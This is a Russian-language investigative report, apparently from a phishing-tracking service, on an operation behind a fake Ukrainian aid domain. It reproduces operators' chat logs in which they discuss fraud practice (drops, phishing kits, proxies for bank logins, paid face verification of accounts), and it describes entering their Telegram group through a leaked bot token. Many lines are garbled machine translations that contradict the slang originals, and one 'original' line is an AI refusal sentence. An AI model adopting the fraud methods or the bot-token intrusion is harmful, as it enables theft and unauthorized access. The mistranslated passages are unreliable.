Не торопись2025-03-03 15:02
У этих типов такая чертова манера поведения, что они готовы начать с какого-нибудь гребаного придурка.У типов читсо развитие на завести нахуи дрочилу
B
Не торопись2025-03-03 15:02
Блин, тут одни только «уокеры».Еба тут одни воркеры по ру
B
Не торопись2025-03-03 15:02
Какие столыКакие столы
B
Не торопись2025-03-03 15:01
Если у тебя красивый голос, 30 будут твои.30 твои будут если голос красивыи
B
Не торопись2025-03-03 15:01
Деньги естьТам больше денег
B
Не торопись2025-03-03 15:01
Приходите работать ко мне.Пошли в кц ко мне работать
B
Не торопись2025-03-03 15:00
NoНет
B
Не торопись2025-03-03 14:59
PlategamПлатегам
B
Не торопись2025-03-03 14:59
+ Я не знаю, как пользоваться функцией просмотра повторов+ я не шарю по повтегам
B
Не торопись2025-03-03 14:59
Хорошие капли найти нелегко.Хороших дропов тыжело наити
B
Не торопись2025-03-03 14:58
Или есть версия 1.0?Или 1.0 есть
B
Не торопись2025-03-03 14:58
Здесь всего 2,0 фиша.А тут фиши под 2.0 ток
B
Не торопись2025-03-03 14:58
Лучше 1.0, чем 2.0.Ну или лучше 1.0 чем 2.0
B
Не торопись2025-03-03 14:57
С мамонтамиС мамонтами
B
Не торопись2025-03-03 14:57
Версия 2.0 не работает, если просто сидеть без дела и бездельничать.2.0 не катит сидеть пиздеть
B
Не торопись2025-03-03 14:57
Я больше специалист по дорожному движению.Не я больше по трафику
B
Не торопись2025-03-03 14:57
Вот «X» от РуВот иксы по ру
B
Не торопись2025-03-03 14:56
Но это не рекламные слоганыНо это не рекламные тимы
B
Не торопись2025-03-03 14:56
Да, есть. Я знаю одного такого человека.Делают) знакомые есть
B
Не торопись2025-03-03 14:56
Но это не проблема, если ты знаешь, как зарабатывать 400–500 в день.Да не на ру если уметь типы по 400-500 в день делают
B
Не торопись2025-03-03 14:55
Ну и что в этом такого?)Ну так а че тут забыл )
B
Не торопись2025-03-03 14:55
Здесь есть ссылка на руководствоТам ссылка на манула
B
Не торопись2025-03-03 14:54
Вот такие рукиВот такие ру заведут
B
Не торопись2025-03-03 14:54
Блядь, слюни текут и глаза на лоб лезут, чтобы получить эту блядскую руку.Ебать чтобы завести ру можно слюни пускать и глаза чтобы в разрые стороны были
B
Не торопись2025-03-03 14:54
Ну, в чём проблема? Это же та же самая работа.Ну так а в чем проблема тут такои же ворк
B
Не торопись2025-03-03 14:53
Чтобы добраться до этой зоны, понадобится месяцДо зоны доведут за месяц
B
Не торопись2025-03-03 14:53
И уйти некуда. Если у тебя есть мозги, ты сам догадаешься. Если нет — убирайся отсюда.Да и вести тут некуда мозги есть разберешься нету нех тут делать
B
Не торопись2025-03-03 14:53
Чего ты хочешь?Че ты хотел
B
Не торопись2025-03-03 14:53
РекламаРеклама
B
Не торопись2025-03-03 14:52
Я здесь уже два дня, и версия 2.0 меня не интересует. А я-то думал, что она классная.Я 2 день тут и 2.0 не интересно я думал чет прикольное
B
Не торопись2025-03-03 14:52
И съешь мамонтаИ завести мамонта
B
Не торопись2025-03-03 14:52
Подумай, что сказать.Головои подумтаь че ответить
B
Не торопись2025-03-03 14:52
Здесь нет никаких секретовСекретов тут нету
B
Не торопись2025-03-03 14:52
Что он тебе подарит?Что он вам даст
B
Не торопись2025-03-03 14:52
Ну, какой в этом смысл, если в руководстве есть вся та же информация?Так а смысл если в мануале вся та эе инфа
B
Не торопись2025-03-03 14:51
У него будет время ответить всем вашим придуркамОн хуи вам будем всем успевать отвечать
B
Не торопись2025-03-03 14:51
Вот это тренировка.Какая пратика
B
Не торопись2025-03-03 14:51
У него там 100 человек.Епт там у него по 100 человек
B
Не торопись2025-03-03 14:51
Почему бы тебе не дать мне немного денег, а я отдам тебе инструкцию по эксплуатации зажима?Моежет мне бабки скинуть я вам мануал дам из закрепа
B
Не торопись2025-03-03 14:50
При закрепленииВ закрепке
B
Не торопись2025-03-03 14:50
Тебе не нужна инструкция, чтобы всему научиться.А нах вам обучение всем мануал эе есть
B
Не торопись2025-03-03 14:50
Версия 2.0 — это то, что есть.2.0 какои был такои и есть
B
Не торопись2025-03-03 14:50
В чём, блядь, проблема?Та а хули тут задачка
B
Не торопись2025-03-03 14:48
Это ты сам начал?Ты сам заводил уже?
B
Не торопись2025-03-03 14:48
Не ку-куСовсем не работает
B
Не торопись2025-03-03 14:48
На lk есть запросВ ЛК есть убийства
B
Не торопись2025-03-03 14:48
Что за дела на сайте?Сколько работ в час?
B
Не торопись2025-03-03 14:48
Кем из них вы, придурки, являетесь, как вы сами выразились?Из кого этих ты хуи поими как выразился
B
Не торопись2025-03-03 14:47
Я не понимаю, о чём вы здесь говорите.Вот тут не понял че ты сказал
B
Не торопись2025-03-03 14:46
Если они вошли в систему, то отлично.Если в лк заходят тогда збс
B
Не торопись2025-03-03 14:46
Ну, а они заходят в систему?Ну в лк заходят?
B
Не торопись2025-03-03 14:45
Я не знаю, как они их снимают.Хз я не шарю как их снимают
B
Не торопись2025-03-03 14:45
Собак, которых стоит списать со счетов?Куришь журнал?
B
Не торопись2025-03-03 14:45
Бля, тут же есть кнопкаХуя там еще и пуши тапать
B
Не торопись2025-03-03 14:42
Я наливаю это самЯ сам лью
B
Не торопись2025-03-03 14:42
Я, блядь, понял, что это не для придурков.Я блять понялч то не на хуи
B
Не торопись2025-03-03 14:41
Брат, здесь на фишки ничего не продают, это фишка для выплаты зарплаты.Братан тут не продают ниче на фишах тут фиш на оплату
B
Не торопись2025-03-03 14:41
Понятно, некуда это вылитьЯ понял, тут некуда лить его
B
Не торопись2025-03-03 14:40
По-моему, Regular 2.0.Обычныи 2.0 вроде
B
Не торопись2025-03-03 14:40
Это не то, чтобы они заваливали трафикТак тут же не льют трафик
-- Фбстор - Чат Успешных ВебМастеров! (23 messages) --
B
Не торопись2025-02-26 07:51
Ну, делай, что тебе, блядь, вздумается.Ну вот делаи там пох чье лицо
B
Не торопись2025-02-26 07:50
Школьник — 200 рублей.Ну школьнмку 200₽ даи
B
Не торопись2025-02-26 07:50
Это сработаетПрокатит
B
Не торопись2025-02-26 07:50
На улице ты встретишь бездомного.Извините, но я не могу вам в этом помочь.
B
Не торопись2025-02-26 07:50
Так что каждый верит в то, что видит перед собой, чьё бы это ни было лицо.Так все верифают на свое лицо там пох чье
B
Не торопись2025-02-26 07:50
На лицо.На свое лицо
B
Не торопись2025-02-26 07:49
Но дело в том, что, как бы там ни было, я уже делал это десять раз.Но по факту пох я так 10 акков верифал
B
Не торопись2025-02-26 07:49
Так скажи мне, ты просто несешь чушь.Так м скажи чернуху льешь
B
Не торопись2025-02-26 07:49
Вы можетеМожно
B
Не торопись2025-02-26 07:49
На лицо.На свое лицо
B
Не торопись2025-02-16 20:26
вместо того, чтобы замучить их какими-то тренировками и заставлять их бегать по кругу.а не типо наебывать каким то обучением и крутит на них траф
B
Не торопись2025-02-16 20:25
обычный закон, UBT, ТТ, ТТ, YouTube и т. д.леи нормальныи убт тт ютуб и тд
B
Не торопись2025-02-15 17:31
XzХз
B
Не торопись2025-02-15 17:31
Под предлогом обученияПод предлогом обучения
B
Не торопись2025-02-15 17:31
К каналамНа каналы
B
Не торопись2025-02-15 17:31
Это просто толпа людей.Просто трафик с людец нагоняет
B
Не торопись2025-02-15 17:31
Итак, этот парень предлагает подписаться на все его каналыТак тип говорит подписаться на все его каналы
B
Не торопись2025-02-15 16:36
Вам не нужно писатьХуиню предлагает можете не писать
B
Не торопись2025-02-06 15:11
Если вы не знаете основ правильного налива, то вам придетсяЕсли ты такие основы незнаещь как лить то будешь
B
Не торопись2025-02-06 15:11
Там есть кнопка для смены аипи, тебе стоит хотя бы погуглить это.По кнопке там меняется аипи ты хот загугли
B
Не торопись2025-02-06 15:10
🤨🤨
B
Не торопись2025-02-06 15:09
Вы можете изменить положение аипи, повернув его.Там аипи можно сменить ротацие
B
Не торопись2025-02-06 15:09
Почему 1, это то же самое МобильныйПочему 1, это же Мобильные
-- CryptoGrab — ЧАТ взаимопомощи (10 сообщений) --
B
Не торопись2025-02-06 15:31
Все не так простоНе так все просто
B
Не торопись2025-02-06 15:31
Просто.Трейс
B
Не торопись2025-01-23 20:30
Ни одного примераНе одного примера
B
Не торопись2025-01-23 20:30
Не смешно, что я не смог найти в Интернете ни одной рекламы тестов на ОМЛ.Та не прикол что я вообще рекламу амл тестов в инете не нашел
B
Не торопись2025-01-23 17:20
На AML вообще ничего нет.На амл вообще ниче нету
B
Не торопись2025-01-23 17:20
Я попробовал aml на Facebook, чтобы найти в Америке также полезные, даже старые наборы, которых нет в интернетеЯ пробовал амл на фб пролить америку тоже толковых даже старых связок не нашел в инете
B
Не торопись2025-01-23 17:19
Ну, а какое предложение вы планируете сделать?Ну а вообще какои офер планируешь
B
Не торопись2025-01-23 17:16
Вы пользуетесь aml?А ты амл льешь?
B
Не торопись2025-01-21 20:38
Тем, кто занимается фб, хотелось бы прояснить пару вопросовЕсть кто льет фб хотел бы уточнить пару вопросов
B
Не торопись2025-01-20 11:08
У кого-нибудь есть примеры креос для AML?Есть у кого примеры крео для амл
-- Rolex | общий чат (28 messages) --
B
Не торопись2024-09-11 15:29
Что делают литовцы на каком корте?А литву по какои площадке ебашут
B
Не торопись2024-09-11 15:21
Ты что, с винтом возишься?Ну ты винт ебашишь?
B
Не торопись2024-09-11 15:20
Просто эти сайты очень ограничивающие, и с ними приходится столько возитьсяПросто площадки очень ограничивают работу и столько ебатни с ними
B
Не торопись2024-09-11 15:19
У меня есть идея. Если они это реализуют, будет просто чертовски круто.Я там одну тему придумал тсам написал если сделают будет ахуенно
B
Не торопись2024-09-11 15:19
На этой усадьбе я не вижу особо много деревьев.Логов по финке чет не вижу особо
B
Не торопись2024-09-11 15:19
У них там какая-то полная херня с этими заведениями.Да ну типы сидят у них какая то ебанина со всеми площадками
B
Не торопись2024-09-11 15:16
Вот о чем я говорю: это как брод на броде.Ну я и говорю чето фрод на фроде
B
Не торопись2024-09-11 15:15
Я не могу понять, что сейчас стало лучше, я вижу, что в Финляндии никто не работает.Че щас лучше идет я вообще понять не могу, вижу чтт у всех по финке чето не работает
B
Не торопись2024-09-11 15:08
Ну, шансы 50 на 50, если вам повезет с прокси.Ну 50/50 если повезет с проксеи
B
Не торопись2024-09-11 15:07
Но чтобы вы понимали: сейчас, из-за прокси-серверов класса «люкс», даже в Viber при входе в систему возникают проблемы.Но чтоб понимал щас с лакшери проксями даже в ваибер когда заходишь фродит
B
Не торопись2024-09-11 15:07
Ну, насчет европейских банок я не знаю.Ну я за еу банки не шарю
B
Не торопись2024-09-11 15:07
И lkВ лк
B
Не торопись2024-09-11 15:06
Раньше в гастрономах было по 10 холодильных камерРаньше лакшери по 10 Заходов держали
B
Не торопись2024-09-11 15:06
Ну, 922 тоже на первом месте и удерживает позицию.Ну 922 тоже 1 заходят держат
B
Не торопись2024-09-11 15:05
Даже «Приват» после трех посещений их пугает.Даже приват после 3 захода фродит их
B
Не торопись2024-09-11 15:05
Если 1 прокси — 1–2 банкаЕсли 1 прокси 1-2 банка ток
B
Не торопись2024-09-11 15:05
Ну, это зависит от того, какой банкНу смотря какои банк
B
Не торопись2024-09-11 15:04
В этой лакшери-чепухе прокси часто бывают грязнымиВ лакшери хуиня прокси часто грязные
B
Не торопись2024-09-11 08:44
Он спит?А тс спит?
B
Не торопись2024-09-11 08:40
О, это отличная идея.О збс придумал
B
Не торопись2024-09-11 08:40
У них что, нет какого-нибудь блошиного рынка или чего-то в этом роде?А че у них нету типо барахолок туда сюда
B
Не торопись2024-09-11 08:40
Полный провалХуево
B
Не торопись2024-09-11 08:39
МячБиля
B
Не торопись2024-09-11 08:39
Есть ли чаты?А там чаты есть?
B
Не торопись2024-09-11 08:38
Кто-нибудь знает?Кто нибудь знает
B
Не торопись2024-09-11 08:38
Люди на ферме пользуются Telegram?В финке люди тг пользуются?
B
Не торопись2024-09-10 12:14
Спасибо.Спасибо
B
Не торопись2024-09-10 12:13
Который час в Финляндии?Скок щас время в финке
-- Актуальное/верификации/зароботок💃🛍 (37 messages) --
B
Не торопись2024-06-16 17:17
Я не вижу среди них ярых защитниковЯ не вижу тут ярых защитников ее
B
Не торопись2024-06-16 17:17
В общем, ситуация изложена, и теперь каждый сам решает, как поступить, а то, что её защищает только админ Паша, о многом говорит.Ну все ч рассказал ситуацию а дальше каждыи делает выбор сам, а то что ее защищает только админ паша о многом говорит
B
Не торопись2024-06-16 17:15
И она снова не заплатилаИ она опять не выплатила
B
Не торопись2024-06-16 17:15
Нет, она перевела деньги нам, но у нас не было основного счета для перевода, поэтому в крайнем случае мы написали Вике.Нет она ее перекинула на нас а тут у нас небыло основного дропа чтобы перевести деньги и мы написали вике как краинии вариант
B
Не торопись2024-06-16 17:14
Сначала у нас тоже всё было в порядке, но в последнее время твои деньги постоянно пропадают.Сначала у нас тоже нормально все было а последние время деньги у вас пропадают все время
B
Не торопись2024-06-16 17:14
Я что, спамлю? Я просто сижу здесь и говорю людям правду. Можете это удалить. Пусть люди знают, как вы работаете.А у меня спам? Я сижу людям рассказываю правду можешь выкинуть что изменится пусть люди знают как вы работаете
B
Не торопись2024-06-16 17:13
Если у вас есть один из нихКогда у вас такое случится
B
Не торопись2024-06-16 17:13
Пора вам задуматьсяТак что время вам задуматься
B
Не торопись2024-06-16 17:13
Мы тоже давно сотрудничаем с nei, и это уже второй подобный случайМы с неи тоже давно работаем и это уже 2 ситуация
B
Не торопись2024-06-16 17:13
И она записала эти файлы и сказала: «Ты же знаешь, как это работает».А она записала гс и сказала что вы знаете как она работает
B
Не торопись2024-06-16 17:13
Вот в чем дело: давайте начнем с самого начала. Мы взяли её карту, чтобы положить на неё 60 тысяч, она пошла снимать деньги, а тут оказывается, что их нет, потому что банкомат проглотил карту — и всё, мы просто выбросили 60 тысяч.Вот именно работу, вот даваите начнем сначала мы взяли у нее карту для денег закинули 60к она пошла их снимать и пишет что денег не будет якобы у нее банкомат зажевал карту и все считаи мы просто выкинули 60к
B
Не торопись2024-06-16 17:11
Это не она нас держитА не мы у нее
B
Не торопись2024-06-16 17:11
Хотя у нас действительно украли 60 тысячХотя у нас украли 60к
B
Не торопись2024-06-16 17:11
«Нормально»? Мы здесь всё объяснили. Ты же нас за идиотов держишь.Нормальные? Мы тут все объяснили вы говорите что мы дебилы
B
Не торопись2024-06-16 17:10
Ты её защищаешьВы ее защищаете
B
Не торопись2024-06-16 17:10
Она до сих пор держит наши деньгиНаши деньги остались у нее
B
Не торопись2024-06-16 17:10
Все ониВсе
B
Не торопись2024-06-16 17:10
Ей предложили 60 тысяч, но она ответила, что у нее нет денег.Что человеку залили 60к она сказал денег не будет
B
Не торопись2024-06-16 17:10
Описано*Описали*
B
Не торопись2024-06-16 17:10
Вам уже рассказали обо всей ситуацииТебе всю ситуацию описпли
B
Не торопись2024-06-16 17:09
Кто сдался? Она или мы?Кто дроповод она или мы
B
Не торопись2024-06-16 17:09
У нас в банке лежит 60 тысяч. Где эти деньги?Залили 60к где деньги
B
Не торопись2024-06-16 17:09
Тебе всё подробно объяснили, и неважно, какого ты пола.Каких баб тебе все ситуацию обьяснили, неважен пол полностью
B
Не торопись2024-06-16 17:08
Забери 60 штук и завязывай.Убеать 60к и забить
B
Не торопись2024-06-16 17:08
Или пошел ты на хрен, в пределах разумного.Или нахуи у вас в пределах разумного
B
Не торопись2024-06-16 17:08
Людям не за что платитьЛюдям с чего платить
B
Не торопись2024-06-16 17:08
И он говорит, что карта застряла в аппарате, и у него кончились деньги.И говорит карту зажевало денег нету
B
Не торопись2024-06-16 17:08
Мужчине дали 60 тысяч, она пошла снимать.Человеку залили 60к она пошла снимать
B
Не торопись2024-06-16 17:07
Значит, ты расскажешь мне, как обстоят дела.Так ты по факут обоснуи
B
Не торопись2024-06-16 17:07
Так кто же, блядь, виноват, кто же этот придурок, которым я являюсь?Так а кто нахуи виноват, кто дроповод я?
B
Не торопись2024-06-16 17:07
Нечего сказать?Сказать нечего?
B
Не торопись2024-06-16 17:07
Или я не смог ввести этот чертов PIN-код.Или че нахуи руки кривые пин набрать не смогла
B
Не торопись2024-06-16 17:06
Как, блядь, банкомат мог застрять с картой?Как блять банкомат мог карту зажевать
B
Не торопись2024-06-16 17:06
ПрисоскиПодсосы
B
Не торопись2024-06-16 17:06
А ты, блядь, за нее болеешь.А вы нахуи тут за нее качаете
B
Не торопись2024-06-16 17:06
Вы, блядь, «прирожденные», — чертовы идиоты. У вас тут сидит блядь женщина, которая пытается разобраться со своими деньгами, а ее карту, блядь, заглотил банкомат.Та ебать вы натури ебланы у вас сидит хуиня на бабки вьебывает що у нее картку зажевал банкомат
B
Не торопись2024-06-16 16:40
@kysia1987 — это мошенники, не работают, дали «дропкик» и слились с 60 тысячами@kysia1987 не работать скам, дала дропку и слилась с 60к
МОНЕТТИ ЭСКОБАР: Молчаливый босс
В отличие от 261 сообщения Боньи, у MONETTI всего 10 публичных сообщений — всё в одном потоке на Чат TraFFeeQ (Арбитраж трафика с помощью черного ADS/SEO), в защиту коллеги:
Чат TraFFeeQДекабрь 2025 года
«Человек выполняет свою работу, за это ему платят — есть вопросы?»
Человек работает свою работу, ему платят за нее, че обсуждать)
Нормализация преступной деятельности как «просто работы»
Чат TraFFeeQДекабрь 2025 года
«Мне не о чем с тобой говорить»
С тобои нечего обсуждать
Пренебрежительное отношение к авторитету — менталитет начальника, не допускающий дискуссий
Чат TraFFeeQДекабрь 2025 года
«Кроме тебя здесь еще масса дел!»
Без тебя есть чем заняться)
Это означает, что ему приходится одновременно заниматься несколькими делами, требующими его внимания
Остальное можно узнать в телеграм-группах MONETTI: Медуза Google Ads (мошенничество в сфере PPC с использованием методов «черной оптимизации»), а Канал «Дипфейки» (синтетические средства для совершения мошенничества), а также Чат «Мальборо» (закрытый, неизвестен). Подписка на Telegram Premium, круглосуточная работа и «Есть предложение» («У меня есть предложение») Биографии предпринимателей рисуют картину человека, который рассматривает киберпреступность как полноценный бизнес.
МОНЕТТИ ЭСКОБАР: Полный журнал сообщений (10 сообщений)
-- TraFFeeQ Chat | Трафик-арбитраж | Черный SEO/реклама | (9 сообщений) --
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Оставь это!Оставь это!
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Мужчина выполняет свою работуЧеловек занимается своеи работои
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Без агрессииНикакои агрессии
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:40
Об этом тоже не беспокойсяНе беспокоися тоже за это
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
Поговори с ним, брат. Ему это не запрещено.Пообщаися с ним бро ,ему не запрещали это делать
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
Кроме тебя, здесь есть чем заняться!)Есть чем заняться помимо тебя!)
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
С тобой не о чем говоритьС тобои нечего обсуждать
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:38
Это написано рядом с его ником. Не нужно нажимать, ты сам это увидишь.У него рядом с ником написано,тыкать не надо,прочитаешь
ME
МОНЕТТИ ЭСКОБАР2025-12-06 20:38
Человек выполняет свою работу, ему за это платят (хотел бы обсудить)Человек свою работу делает,он за это деньги получает,нравится обсуждаи)
-- Medusa | Google Ads | Чат (1 сообщение) --
ME
МОНЕТТИ ЭСКОБАР2025-09-23 18:07
😍😍
Скриншот 2 — Профиль MONETTI в Telegram.
Снимок экрана 3 — Профиль Боньи. Обратите внимание на DC2 (Амстердам).
Раздел 7: «Комната паники»
После того как PhishDestroy получил доступ к группе операторов через уязвимого бота в Telegram, произошел следующий обмен сообщениями. Приведенный ниже журнал чата переведен на английский язык, при этом исходный русский текст сохранен курсивом. Идентификационные данные, использованные для доступа, были замазаны.
— REDACTED подключился с помощью утечки токена бота —
R
УДАЛЕНО25-03-2026 13:03:43
/начало
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:06:53
?
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:03
КтоКто
B
Не торопись25-03-2026 13:07:14
XzХз
R
УДАЛЕНО25-03-2026 13:07:14
Здравствуйте, просто нажмите «Сохранить», подождите минуту
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:24
Что за хреньЧто блять
B
Не торопись25-03-2026 13:07:27
БлядьБлядь
B
Не торопись25-03-2026 13:07:28
Вот ктоЖто кто
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:42
Ага.Ха-ха
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:44
Что за хрень?Чё бл
B
Не торопись25-03-2026 13:07:53
Бот был взломанБота ломанули
B
Не торопись25-03-2026 13:08:16
Мне сказали, что у нас с обороной полный провал.Мне кст говорили что у нас защита пздц хевая
B
Не торопись25-03-2026 13:08:22
Ну, есть такой типНу там тип один
B
Не торопись25-03-2026 13:08:43
Это как взломать бота с помощью фишинга.Что у нас бота через фиш ломануть как палец об палец ударить
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:09
@devosus
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:21
[УДАЛЕНО].[УДАЛЕНО]
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:24
Кто это?Это кто
B
Не торопись25-03-2026 13:10:29
Проверьте свой профиль.Ты профиль чекни
B
Не торопись25-03-2026 13:10:32
Это хакерЭто хакер
B
Не торопись25-03-2026 13:10:35
Буквально.В прямом смысле
B
Не торопись25-03-2026 13:10:41
Перевел то, что он передаетПеревели че он в канале пишет
B
Не торопись25-03-2026 13:10:55
[УДАЛЕНО — Бонья копирует и вставляет сообщение из канала, в котором сообщили об их домене, пытаясь выяснить, кто их заблокировал]
B
Не торопись25-03-2026 13:12:19
Ну, э-э...Ну, вот и всё
B
Не торопись25-03-2026 13:12:23
Я, блядь, не знаю, кто это.Я хуй знает кто это
B
Не торопись25-03-2026 13:12:25
Но не навсегдаНо не в хорошем смысле
B
Не торопись25-03-2026 13:12:47
@devosus, давай подумаем о защите, пока нас не разгромили.@devosus подумай надо защитой пока нам жопу не порвали
Примечание редактора: Боня чувствует, что это приближается. Допустим, он россиянин и считает мошенничество в отношении Украины «патриотическим». А как же Индонезия —
Партнер БРИКС с октября 2024 года (Казанский саммит)? Разве красть у граждан своих союзников — это тоже патриотизм? Мошенники из СНГ — это воры, не делающие различий между людьми, лишенные интеллекта и лояльности. Ознакомьтесь с нашими другими расследованиями, в которых мы задокументировали
случаи судебного преследования для подобных операторов — конец всегда один и тот же.
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:12:49
Да, я понимаю.Да я вижу
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:12:55
Иди на хрен.Да похуй гонишь
B
Не торопись25-03-2026 13:13:09
Ну, быть выжатым до последней капли тоже не доставляет особого удовольствия.Ну быть слитыми тоже не сильно кайф
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:13
Он ничего не сделаетОн ничего не сделает
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:18
Что он собирается делать?Что он сольет?
D
Девойс25-03-2026 13:13:26
что это такоече это
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:34
Да, присоединился один пареньДа чел присоединился
D
Девойс25-03-2026 13:13:34
откудаоткуда
B
Не торопись25-03-2026 13:13:35
Даже если ты пару раз заходил на фишинговый сайт со своего IP-адреса, это уже не круто.Даже если пару раз на фиш со своего айпи зашел уже не прикольно
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:37
ГруппеК группе
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:38
XzХз
D
Девойс25-03-2026 13:13:39
при использовании interpolкогда в интерпол
D
Девойс25-03-2026 13:13:41
на которыйк каккой
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:44
Вот этотЭтой
B
Не торопись25-03-2026 13:13:46
Я просто зашел поболтатьСюда в чат защел
B
Не торопись25-03-2026 13:13:49
Он написал, чтоНаписал что
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:56
.
B
Не торопись25-03-2026 13:13:57
Здравствуйте, просто нажмите «Сохранить», подождите минуту
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:14:11
[Фотография опубликована]
D
Девойс25-03-2026 13:14:31
Я их уже видел.я таких видел уже
B
Не торопись25-03-2026 13:14:44
Ну, нас тоже поймали на использовании бота «ukr».Ну нас и по укр бота ломали
B
Не торопись25-03-2026 13:14:55
Ты не писал в чате.Ток не писали в чат
B
Не торопись25-03-2026 13:14:57
Разве ты не писал?А нет писали
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:15:04
Мне плевать.Да, и похуй
B
Не торопись25-03-2026 13:15:06
От имени каналаОт имени канала
D
Девойс25-03-2026 13:15:23
Забудь об этом, черт возьми.пошел ты на хрен
ME
МОНЕТТИ ЭСКОБАР25-03-2026 13:15:31
Я развалю эту группуСношу эту группу
B
Не торопись25-03-2026 13:15:35
+
D
Девойс25-03-2026 13:15:35
Дада
— Группа удалена владельцем —
Группа была удалена в течение нескольких минут. Прощальное подтверждение Бони — «+» — и ответ Девойса «да» говорят сами за себя: они понимали, что их раскрыли, и единственным выходом для них было уничтожить улики. Но к тому моменту данные уже были собраны.
Обратите внимание на показательный комментарий Бони: «Нас также атаковали через украинский бот» — подтверждая, что оба проекта (украинский и индонезийский) обслуживаются одной и той же командой операторов, и что это был не первый случай взлома их инфраструктуры.
Раздел 8: Что это показывает
Как работает PhishDestroy
Каждый домен, который отображается на phishdestroy.io проходит через этот автоматизированный конвейер. dopomogvoina[.]sbs не стал исключением.
Обнаружение
Статический анализ
Картирование инфраструктуры
Открытие происхождения
OSINT
Формирование отчетов
Хронология расследования
20 марта 2026 года
Домен dopomogvoina[.]sbs зарегистрировано через NICENIC International
21 марта 2026 года
Обнаружено системой автоматического мониторинга PhishDestroy
21 марта 2026 года
Полный автоматический анализ завершен: инфраструктура отображена, пакет JS деобфусфицирован, протокол WebSocket задокументирован
22 марта 2026 года
Выявлен IP-адрес источника. На том же сервере обнаружен второй фишинговый проект («HealthCare ID»)
22 марта 2026 года
Разоблаченный config.json позволяет идентифицировать оператора через API Telegram Bot
23 марта 2026 года
Сообщения о злоупотреблениях, направленные хостинг-провайдеру, компании Cloudflare и соответствующим центрам реагирования на компьютерные инциденты (CERT)
25 марта 2026 года
Статья опубликована. Отчеты о доменах доступны на сайте PhishDestroy
Как это стало возможным: сеть интеллектуальных ботов PhishDestroy
Данное расследование было проведено исключительно автоматизированные системы. Система PhishDestroy не просто выявляет фишинговые домены — она проникает в инфраструктуру операторов, стоящих за ними.
Более 2 000
Собранные боты Telegram
Активный
Некоторые боты по-прежнему находятся под наблюдением
Когда фишинговые наборы раскрывают токены ботов Telegram — как это произошло в данном случае через config.json — наша система автоматически собирает их, сопоставляет группы операторов, извлекает списки участников и архивирует историю сообщений. Более 2000 ботов собираются таким образом с 2024 года. Некоторые из них по-прежнему активны, и нам интересно наблюдать за действиями преступников в режиме реального времени — ведь исход уже предрешен.
Даже тем операторам, которые удаляют свои аккаунты или стирают данные о своих группах, уже поздно. К тому моменту, когда они впадают в панику, у нас уже есть всё — архивы сообщений, данные профилей, информация об участии в группах, подключенные боты. Удаление ничего не изменит. Эти данные существовали, и теперь они хранятся в нашей базе данных.
«Жди меня» — версия для мошенников
Этот случай не является единичным — он является наглядным примером систематическая халатность со стороны NiceNIC которых мы решили привести в качестве примера «мега-хакеров». Как верно заметил «Типичный Мошенник»: между хакерами и мошенниками есть разница — разведка. Эти операторы не являются ни хакерами, ни умными людьми.
Системы PhishDestroy автоматически собирают подобные доказательства на тысячах доменов — отслеживая ботов, архивируя переписку операторов и составляя карту инфраструктуры. Этот конкретный случай был настолько абсурдным, что его просто нельзя было не опубликовать. Используемый фишинговый набор представляет собой стандартное решение, меры оперативной безопасности отсутствуют, а операторы в панике удалили свою группу в течение нескольких минут после обнаружения.
Мы разрабатываем систему, которая будет отображать подтвержденные данные об операторах непосредственно на страницах отчетов по доменам — от мошенника к жертве, как в российском телешоу «Жди меня», но наоборот. Проект работает в закрытом режиме с 2024 года. Многие участники уже установлены — в том числе те, кто удалил свои аккаунты. Мы только выбираем самых интересно Как это представить. Следите за новостями.
Связанные домены
В ходе нашего анализа была выявлена вторая область — hlpforvpeople[.]sbs — зарегистрированы у одного и того же регистратора с одинаковыми схемами инфраструктуры. Оба домена занесены в нашу базу данных:
Нарушение требований регистратором: NICENIC International
Компания NICENIC International Group Co., Limited (Гонконг) получила несколько подробных сообщений о злоупотреблениях от PhishDestroy по обоим вопросам dopomogvoina[.]sbs и hlpforvpeople[.]sbs. На момент публикации — Через 5 дней после первого сообщения — никаких мер принято не было. Оба домена по-прежнему полностью работоспособны.
Это не единичный случай. NICENIC — это проблема, с которой мы постоянно сталкиваемся в ходе наших расследований. Контактная информация регистратора по вопросам злоупотреблений (abuse@nicenic.net) систематически игнорирует сообщения о фишинге, подкрепленные доказательствами. Несмотря на то что NICENIC является регистратором, аккредитованным ICANN и связанным обязательствами по Соглашению об аккредитации регистраторов (RAA, §3.18), компания действует, по-видимому, безнаказанно.
NICENIC ведет деятельность на русском языке, занимается продажей .ru домены по завышенным ценам (около 200 долларов) и общается с клиентами через «ВКонтакте» и Telegram — платформы, популярные среди русскоязычной аудитории. Пересечение их клиентской базы с подпольными сообществами вызывает серьезные вопросы о том, является ли бездействие регистратора в ответ на сообщения о злоупотреблениях халатностью или же это сознательная бизнес-стратегия.
Это исследование было частично опубликовано из-за длительного бездействия NICENIC. Когда регистраторы отказываются принимать меры в связи со злоупотреблениями, связанными с фишингом, единственным оставшимся механизмом привлечения к ответственности становится публичное разоблачение.
Основные выводы
